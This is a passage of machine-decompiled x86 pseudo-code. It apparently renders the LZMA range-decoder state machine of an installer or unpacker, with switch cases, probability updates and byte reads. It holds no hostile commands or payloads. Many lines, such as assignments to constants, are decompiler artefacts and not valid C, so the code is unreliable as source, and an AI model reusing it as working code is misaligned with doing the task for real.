                                                                                                                                                              											case 3:
                                                                                                                                                              												L21:
                                                                                                                                                              												__eflags =  *(_t621 - 0x6c);
                                                                                                                                                              												if( *(_t621 - 0x6c) == 0) {
                                                                                                                                                              													 *(_t621 - 0x88) = 3;
                                                                                                                                                              													goto L170;
                                                                                                                                                              												}
                                                                                                                                                              												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                                                                                                                              												_t67 = _t621 - 0x70;
                                                                                                                                                              												 *_t67 =  &(( *(_t621 - 0x70))[1]);
                                                                                                                                                              												__eflags =  *_t67;
                                                                                                                                                              												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                                                                                                                                                              												L23:
                                                                                                                                                              												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
                                                                                                                                                              												if( *(_t621 - 0x48) != 0) {
                                                                                                                                                              													goto L21;
                                                                                                                                                              												}
                                                                                                                                                              												goto L24;
                                                                                                                                                              											case 4:
                                                                                                                                                              												L133:
                                                                                                                                                              												_t540 =  *_t614;
                                                                                                                                                              												_t597 = _t540 & 0x0000ffff;
                                                                                                                                                              												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                                                                                                                                                              												if( *(_t621 - 0xc) >= _t573) {
                                                                                                                                                              													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                                                                                                                                                              													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                                                                                                                                                              													 *(_t621 - 0x40) = 1;
                                                                                                                                                              													_t541 = _t540 - (_t540 >> 5);
                                                                                                                                                              													 *_t614 = _t541;
                                                                                                                                                              												} else {
                                                                                                                                                              													 *(_t621 - 0x10) = _t573;
                                                                                                                                                              													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                                                                                                                              													 *_t614 = (0x800 - _t597 >> 5) + _t540;
                                                                                                                                                              												}
                                                                                                                                                              												if( *(_t621 - 0x10) >= 0x1000000) {
                                                                                                                                                              													goto L139;
                                                                                                                                                              												}
                                                                                                                                                              											case 5:
                                                                                                                                                              												goto L137;
                                                                                                                                                              											case 6:
                                                                                                                                                              												__edx = 0;
                                                                                                                                                              												__eflags =  *(__ebp - 0x40);
                                                                                                                                                              												if( *(__ebp - 0x40) != 0) {
                                                                                                                                                              													__eax =  *(__ebp - 4);
                                                                                                                                                              													__ecx =  *(__ebp - 0x38);
                                                                                                                                                              													 *(__ebp - 0x34) = 1;
                                                                                                                                                              													 *(__ebp - 0x84) = 7;
                                                                                                                                                              													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                                                                                                              													L132:
                                                                                                                                                              													 *(_t621 - 0x54) = _t614;
                                                                                                                                                              													goto L133;
                                                                                                                                                              												}
                                                                                                                                                              												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                                                                                              												__esi =  *(__ebp - 0x60);
                                                                                                                                                              												__cl = 8;
                                                                                                                                                              												__cl = 8 -  *(__ebp - 0x3c);
                                                                                                                                                              												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                                                                                              												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                                                                                              												__ecx =  *(__ebp - 0x3c);
                                                                                                                                                              												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                                                                                              												__ecx =  *(__ebp - 4);
                                                                                                                                                              												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                                                                                              												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                                                                                              												__eflags =  *(__ebp - 0x38) - 4;
                                                                                                                                                              												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                                                              												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                                                              												if( *(__ebp - 0x38) >= 4) {
                                                                                                                                                              													__eflags =  *(__ebp - 0x38) - 0xa;
                                                                                                                                                              													if( *(__ebp - 0x38) >= 0xa) {
                                                                                                                                                              														_t98 = __ebp - 0x38;
                                                                                                                                                              														 *_t98 =  *(__ebp - 0x38) - 6;
                                                                                                                                                              														__eflags =  *_t98;
                                                                                                                                                              													} else {
                                                                                                                                                              														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                                                                                              													}
                                                                                                                                                              												} else {
                                                                                                                                                              													 *(__ebp - 0x38) = 0;
                                                                                                                                                              												}
                                                                                                                                                              												__eflags =  *(__ebp - 0x34) - __edx;
                                                                                                                                                              												if( *(__ebp - 0x34) == __edx) {
                                                                                                                                                              													__ebx = 0;
                                                                                                                                                              													__ebx = 1;
                                                                                                                                                              													goto L61;
                                                                                                                                                              												} else {
                                                                                                                                                              													__eax =  *(__ebp - 0x14);
                                                                                                                                                              													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                                                              													__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                                                              													if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                                                              														__eax = __eax +  *(__ebp - 0x74);
                                                                                                                                                              														__eflags = __eax;
                                                                                                                                                              													}
                                                                                                                                                              													__ecx =  *(__ebp - 8);
                                                                                                                                                              													__ebx = 0;
                                                                                                                                                              													__ebx = 1;
                                                                                                                                                              													__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                                                              													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                                                              													goto L41;
                                                                                                                                                              												}
                                                                                                                                                              											case 7:
                                                                                                                                                              												goto L0;
                                                                                                                                                              											case 8:
                                                                                                                                                              												__eflags =  *(__ebp - 0x40);
                                                                                                                                                              												if( *(__ebp - 0x40) != 0) {
                                                                                                                                                              													__eax =  *(__ebp - 4);
                                                                                                                                                              													__ecx =  *(__ebp - 0x38);
                                                                                                                                                              													 *(__ebp - 0x84) = 0xa;
                                                                                                                                                              													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                                                                                                              												} else {
                                                                                                                                                              													__eax =  *(__ebp - 0x38);
                                                                                                                                                              													__ecx =  *(__ebp - 4);
                                                                                                                                                              													__eax =  *(__ebp - 0x38) + 0xf;
                                                                                                                                                              													 *(__ebp - 0x84) = 9;
                                                                                                                                                              													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                                                                                              													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                                                                                                              												}
                                                                                                                                                              												while(1) {
                                                                                                                                                              													L132:
                                                                                                                                                              													 *(_t621 - 0x54) = _t614;
                                                                                                                                                              													goto L133;
                                                                                                                                                              												}
                                                                                                                                                              											case 9:
                                                                                                                                                              												__eflags =  *(__ebp - 0x40);
                                                                                                                                                              												if( *(__ebp - 0x40) != 0) {
                                                                                                                                                              													goto L89;
                                                                                                                                                              												}
                                                                                                                                                              												__eflags =  *(__ebp - 0x60);
                                                                                                                                                              												if( *(__ebp - 0x60) == 0) {
                                                                                                                                                              													goto L171;
                                                                                                                                                              												}
                                                                                                                                                              												__eax = 0;
                                                                                                                                                              												__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                              												_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                                                                                              												__eflags = _t258;
                                                                                                                                                              												0 | _t258 = _t258 + _t258 + 9;
                                                                                                                                                              												 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                                                                                                                              												goto L75;
                                                                                                                                                              											case 0xa:
                                                                                                                                                              												__eflags =  *(__ebp - 0x40);
                                                                                                                                                              												if( *(__ebp - 0x40) != 0) {
                                                                                                                                                              													__eax =  *(__ebp - 4);
                                                                                                                                                              													__ecx =  *(__ebp - 0x38);
                                                                                                                                                              													 *(__ebp - 0x84) = 0xb;
                                                                                                                                                              													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                                                                                                              													while(1) {
                                                                                                                                                              														L132:
                                                                                                                                                              														 *(_t621 - 0x54) = _t614;
                                                                                                                                                              														goto L133;
                                                                                                                                                              													}
                                                                                                                                                              												}
                                                                                                                                                              												__eax =  *(__ebp - 0x28);
                                                                                                                                                              												goto L88;
                                                                                                                                                              											case 0xb:
                                                                                                                                                              												__eflags =  *(__ebp - 0x40);
                                                                                                                                                              												if( *(__ebp - 0x40) != 0) {
                                                                                                                                                              													__ecx =  *(__ebp - 0x24);
                                                                                                                                                              													__eax =  *(__ebp - 0x20);
                                                                                                                                                              													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                                                              												} else {
                                                                                                                                                              													__eax =  *(__ebp - 0x24);
                                                                                                                                                              												}
                                                                                                                                                              												__ecx =  *(__ebp - 0x28);
                                                                                                                                                              												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                                                              												L88:
                                                                                                                                                              												__ecx =  *(__ebp - 0x2c);
                                                                                                                                                              												 *(__ebp - 0x2c) = __eax;
                                                                                                                                                              												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                                                              												L89:
                                                                                                                                                              												__eax =  *(__ebp - 4);
                                                                                                                                                              												 *(__ebp - 0x80) = 0x15;
                                                                                                                                                              												__eax =  *(__ebp - 4) + 0xa68;
                                                                                                                                                              												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                                                                                                              												goto L68;
                                                                                                                                                              											case 0xc:
                                                                                                                                                              												L99:
                                                                                                                                                              												__eflags =  *(__ebp - 0x6c);
                                                                                                                                                              												if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                              													 *(__ebp - 0x88) = 0xc;
                                                                                                                                                              													goto L170;
                                                                                                                                                              												}
                                                                                                                                                              												__ecx =  *(__ebp - 0x70);
                                                                                                                                                              												__eax =  *(__ebp - 0xc);
                                                                                                                                                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                              												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                              												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              												_t334 = __ebp - 0x70;
                                                                                                                                                              												 *_t334 =  *(__ebp - 0x70) + 1;
                                                                                                                                                              												__eflags =  *_t334;
                                                                                                                                                              												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              												__eax =  *(__ebp - 0x2c);
                                                                                                                                                              												goto L101;
                                                                                                                                                              											case 0xd:
                                                                                                                                                              												L37:
                                                                                                                                                              												__eflags =  *(__ebp - 0x6c);
                                                                                                                                                              												if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                              													 *(__ebp - 0x88) = 0xd;
                                                                                                                                                              													goto L170;
                                                                                                                                                              												}
                                                                                                                                                              												__ecx =  *(__ebp - 0x70);
                                                                                                                                                              												__eax =  *(__ebp - 0xc);
                                                                                                                                                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                              												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                              												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              												_t122 = __ebp - 0x70;
                                                                                                                                                              												 *_t122 =  *(__ebp - 0x70) + 1;
                                                                                                                                                              												__eflags =  *_t122;
                                                                                                                                                              												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              												L39:
                                                                                                                                                              												__eax =  *(__ebp - 0x40);
                                                                                                                                                              												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                                                              												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                                                                                              													goto L48;
                                                                                                                                                              												}
                                                                                                                                                              												__eflags = __ebx - 0x100;
                                                                                                                                                              												if(__ebx >= 0x100) {
                                                                                                                                                              													goto L54;
                                                                                                                                                              												}
                                                                                                                                                              												L41:
                                                                                                                                                              												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                                                                                              												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                                                                                              												__ecx =  *(__ebp - 0x58);
                                                                                                                                                              												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                                                                                              												 *(__ebp - 0x48) = __eax;
                                                                                                                                                              												__eax = __eax + 1;
                                                                                                                                                              												__eax = __eax << 8;
                                                                                                                                                              												__eax = __eax + __ebx;
                                                                                                                                                              												__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                                                                                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                              												__ax =  *__esi;
                                                                                                                                                              												 *(__ebp - 0x54) = __esi;
                                                                                                                                                              												__edx = __ax & 0x0000ffff;
                                                                                                                                                              												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                                                                                              												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                              												if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                              													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                              													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                              													__cx = __ax;
                                                                                                                                                              													 *(__ebp - 0x40) = 1;
                                                                                                                                                              													__cx = __ax >> 5;
                                                                                                                                                              													__eflags = __eax;
                                                                                                                                                              													__ebx = __ebx + __ebx + 1;
                                                                                                                                                              													 *__esi = __ax;
                                                                                                                                                              												} else {
                                                                                                                                                              													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                                                                                              													 *(__ebp - 0x10) = __ecx;
                                                                                                                                                              													0x800 = 0x800 - __edx;
                                                                                                                                                              													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                                                                                              													__ebx = __ebx + __ebx;
                                                                                                                                                              													 *__esi = __cx;
                                                                                                                                                              												}
                                                                                                                                                              												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                              												 *(__ebp - 0x44) = __ebx;
                                                                                                                                                              												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                              													goto L39;
                                                                                                                                                              												} else {
                                                                                                                                                              													goto L37;
                                                                                                                                                              												}
                                                                                                                                                              											case 0xe:
                                                                                                                                                              												L46:
                                                                                                                                                              												__eflags =  *(__ebp - 0x6c);
                                                                                                                                                              												if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                              													 *(__ebp - 0x88) = 0xe;
                                                                                                                                                              													goto L170;
                                                                                                                                                              												}
                                                                                                                                                              												__ecx =  *(__ebp - 0x70);
                                                                                                                                                              												__eax =  *(__ebp - 0xc);
                                                                                                                                                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                              												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                              												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              												_t156 = __ebp - 0x70;
                                                                                                                                                              												 *_t156 =  *(__ebp - 0x70) + 1;
                                                                                                                                                              												__eflags =  *_t156;
                                                                                                                                                              												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              												while(1) {
                                                                                                                                                              													L48:
                                                                                                                                                              													__eflags = __ebx - 0x100;
                                                                                                                                                              													if(__ebx >= 0x100) {
                                                                                                                                                              														break;
                                                                                                                                                              													}
                                                                                                                                                              													__eax =  *(__ebp - 0x58);
                                                                                                                                                              													__edx = __ebx + __ebx;
                                                                                                                                                              													__ecx =  *(__ebp - 0x10);
                                                                                                                                                              													__esi = __edx + __eax;
                                                                                                                                                              													__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                              													__ax =  *__esi;
                                                                                                                                                              													 *(__ebp - 0x54) = __esi;
                                                                                                                                                              													__edi = __ax & 0x0000ffff;
                                                                                                                                                              													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                              													__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                              													if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                              														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                              														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                              														__cx = __ax;
                                                                                                                                                              														_t170 = __edx + 1; // 0x1
                                                                                                                                                              														__ebx = _t170;
                                                                                                                                                              														__cx = __ax >> 5;
                                                                                                                                                              														__eflags = __eax;
                                                                                                                                                              														 *__esi = __ax;
                                                                                                                                                              													} else {
                                                                                                                                                              														 *(__ebp - 0x10) = __ecx;
                                                                                                                                                              														0x800 = 0x800 - __edi;
                                                                                                                                                              														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                              														__ebx = __ebx + __ebx;
                                                                                                                                                              														 *__esi = __cx;
                                                                                                                                                              													}
                                                                                                                                                              													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                              													 *(__ebp - 0x44) = __ebx;
                                                                                                                                                              													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                              														continue;
                                                                                                                                                              													} else {
                                                                                                                                                              														goto L46;
                                                                                                                                                              													}
                                                                                                                                                              												}
                                                                                                                                                              												L54:
                                                                                                                                                              												_t173 = __ebp - 0x34;
                                                                                                                                                              												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                                                                                                              												__eflags =  *_t173;
                                                                                                                                                              												goto L55;
                                                                                                                                                              											case 0xf:
                                                                                                                                                              												L58:
                                                                                                                                                              												__eflags =  *(__ebp - 0x6c);
                                                                                                                                                              												if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                              													 *(__ebp - 0x88) = 0xf;
                                                                                                                                                              													goto L170;
                                                                                                                                                              												}
                                                                                                                                                              												__ecx =  *(__ebp - 0x70);
                                                                                                                                                              												__eax =  *(__ebp - 0xc);
                                                                                                                                                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                              												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                              												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              												_t203 = __ebp - 0x70;
                                                                                                                                                              												 *_t203 =  *(__ebp - 0x70) + 1;
                                                                                                                                                              												__eflags =  *_t203;
                                                                                                                                                              												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              												L60:
                                                                                                                                                              												__eflags = __ebx - 0x100;
                                                                                                                                                              												if(__ebx >= 0x100) {
                                                                                                                                                              													L55:
                                                                                                                                                              													__al =  *(__ebp - 0x44);
                                                                                                                                                              													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                                                                                              													goto L56;
                                                                                                                                                              												}
                                                                                                                                                              												L61:
                                                                                                                                                              												__eax =  *(__ebp - 0x58);
                                                                                                                                                              												__edx = __ebx + __ebx;
                                                                                                                                                              												__ecx =  *(__ebp - 0x10);
                                                                                                                                                              												__esi = __edx + __eax;
                                                                                                                                                              												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                              												__ax =  *__esi;
                                                                                                                                                              												 *(__ebp - 0x54) = __esi;
                                                                                                                                                              												__edi = __ax & 0x0000ffff;
                                                                                                                                                              												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                              												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                              												if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                              													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                              													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                              													__cx = __ax;
                                                                                                                                                              													_t217 = __edx + 1; // 0x1
                                                                                                                                                              													__ebx = _t217;
                                                                                                                                                              													__cx = __ax >> 5;
                                                                                                                                                              													__eflags = __eax;
                                                                                                                                                              													 *__esi = __ax;
                                                                                                                                                              												} else {
                                                                                                                                                              													 *(__ebp - 0x10) = __ecx;
                                                                                                                                                              													0x800 = 0x800 - __edi;
                                                                                                                                                              													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                              													__ebx = __ebx + __ebx;
                                                                                                                                                              													 *__esi = __cx;
                                                                                                                                                              												}
                                                                                                                                                              												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                              												 *(__ebp - 0x44) = __ebx;
                                                                                                                                                              												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                              													goto L60;
                                                                                                                                                              												} else {
                                                                                                                                                              													goto L58;
                                                                                                                                                              												}
                                                                                                                                                              											case 0x10:
                                                                                                                                                              												L109:
                                                                                                                                                              												__eflags =  *(__ebp - 0x6c);
                                                                                                                                                              												if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                              													 *(__ebp - 0x88) = 0x10;
                                                                                                                                                              													goto L170;
                                                                                                                                                              												}
                                                                                                                                                              												__ecx =  *(__ebp - 0x70);
                                                                                                                                                              												__eax =  *(__ebp - 0xc);
                                                                                                                                                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                              												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                              												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              												_t365 = __ebp - 0x70;
                                                                                                                                                              												 *_t365 =  *(__ebp - 0x70) + 1;
                                                                                                                                                              												__eflags =  *_t365;
                                                                                                                                                              												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              												goto L111;
                                                                                                                                                              											case 0x11:
                                                                                                                                                              												L68:
                                                                                                                                                              												_t614 =  *(_t621 - 0x58);
                                                                                                                                                              												 *(_t621 - 0x84) = 0x12;
                                                                                                                                                              												while(1) {
                                                                                                                                                              													L132:
                                                                                                                                                              													 *(_t621 - 0x54) = _t614;
                                                                                                                                                              													goto L133;
                                                                                                                                                              												}
                                                                                                                                                              											case 0x12:
                                                                                                                                                              												__eflags =  *(__ebp - 0x40);
                                                                                                                                                              												if( *(__ebp - 0x40) != 0) {
                                                                                                                                                              													__eax =  *(__ebp - 0x58);
                                                                                                                                                              													 *(__ebp - 0x84) = 0x13;
                                                                                                                                                              													__esi =  *(__ebp - 0x58) + 2;
                                                                                                                                                              													while(1) {
                                                                                                                                                              														L132:
                                                                                                                                                              														 *(_t621 - 0x54) = _t614;
                                                                                                                                                              														goto L133;
                                                                                                                                                              													}
                                                                                                                                                              												}
                                                                                                                                                              												__eax =  *(__ebp - 0x4c);
                                                                                                                                                              												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                                                                                              												__ecx =  *(__ebp - 0x58);
                                                                                                                                                              												__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                                                              												__eflags = __eax;
                                                                                                                                                              												__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                                                                                              												goto L130;
                                                                                                                                                              											case 0x13:
                                                                                                                                                              												__eflags =  *(__ebp - 0x40);
                                                                                                                                                              												if( *(__ebp - 0x40) != 0) {
                                                                                                                                                              													_t469 = __ebp - 0x58;
                                                                                                                                                              													 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                                                                                              													__eflags =  *_t469;
                                                                                                                                                              													 *(__ebp - 0x30) = 0x10;
                                                                                                                                                              													 *(__ebp - 0x40) = 8;
                                                                                                                                                              													L144:
                                                                                                                                                              													 *(__ebp - 0x7c) = 0x14;
                                                                                                                                                              													goto L145;
                                                                                                                                                              												}
                                                                                                                                                              												__eax =  *(__ebp - 0x4c);
                                                                                                                                                              												__ecx =  *(__ebp - 0x58);
                                                                                                                                                              												__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                                                              												 *(__ebp - 0x30) = 8;
                                                                                                                                                              												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                                                                                              												L130:
                                                                                                                                                              												 *(__ebp - 0x58) = __eax;
                                                                                                                                                              												 *(__ebp - 0x40) = 3;
                                                                                                                                                              												goto L144;
                                                                                                                                                              											case 0x14:
                                                                                                                                                              												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                                                                                              												__eax =  *(__ebp - 0x80);
                                                                                                                                                              												 *(_t621 - 0x88) = _t542;
                                                                                                                                                              												goto L1;
                                                                                                                                                              											case 0x15:
                                                                                                                                                              												__eax = 0;
                                                                                                                                                              												__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                              												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                                                              												__al = __al & 0x000000fd;
                                                                                                                                                              												__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                                                                                              												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                                                                                              												goto L120;
                                                                                                                                                              											case 0x16:
                                                                                                                                                              												__eax =  *(__ebp - 0x30);
                                                                                                                                                              												__eflags = __eax - 4;
                                                                                                                                                              												if(__eax >= 4) {
                                                                                                                                                              													_push(3);
                                                                                                                                                              													_pop(__eax);
                                                                                                                                                              												}
                                                                                                                                                              												__ecx =  *(__ebp - 4);
                                                                                                                                                              												 *(__ebp - 0x40) = 6;
                                                                                                                                                              												__eax = __eax << 7;
                                                                                                                                                              												 *(__ebp - 0x7c) = 0x19;
                                                                                                                                                              												 *(__ebp - 0x58) = __eax;
                                                                                                                                                              												goto L145;
                                                                                                                                                              											case 0x17:
                                                                                                                                                              												L145:
                                                                                                                                                              												__eax =  *(__ebp - 0x40);
                                                                                                                                                              												 *(__ebp - 0x50) = 1;
                                                                                                                                                              												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                                                                                                              												goto L149;
                                                                                                                                                              											case 0x18:
                                                                                                                                                              												L146:
                                                                                                                                                              												__eflags =  *(__ebp - 0x6c);
                                                                                                                                                              												if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                              													 *(__ebp - 0x88) = 0x18;
                                                                                                                                                              													goto L170;
                                                                                                                                                              												}
                                                                                                                                                              												__ecx =  *(__ebp - 0x70);
                                                                                                                                                              												__eax =  *(__ebp - 0xc);
                                                                                                                                                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                              												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                              												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              												_t484 = __ebp - 0x70;
                                                                                                                                                              												 *_t484 =  *(__ebp - 0x70) + 1;
                                                                                                                                                              												__eflags =  *_t484;
                                                                                                                                                              												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              												L148:
                                                                                                                                                              												_t487 = __ebp - 0x48;
                                                                                                                                                              												 *_t487 =  *(__ebp - 0x48) - 1;
                                                                                                                                                              												__eflags =  *_t487;
                                                                                                                                                              												L149:
                                                                                                                                                              												__eflags =  *(__ebp - 0x48);
                                                                                                                                                              												if( *(__ebp - 0x48) <= 0) {
                                                                                                                                                              													__ecx =  *(__ebp - 0x40);
                                                                                                                                                              													__ebx =  *(__ebp - 0x50);
                                                                                                                                                              													0 = 1;
                                                                                                                                                              													__eax = 1 << __cl;
                                                                                                                                                              													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                                                                                                              													__eax =  *(__ebp - 0x7c);
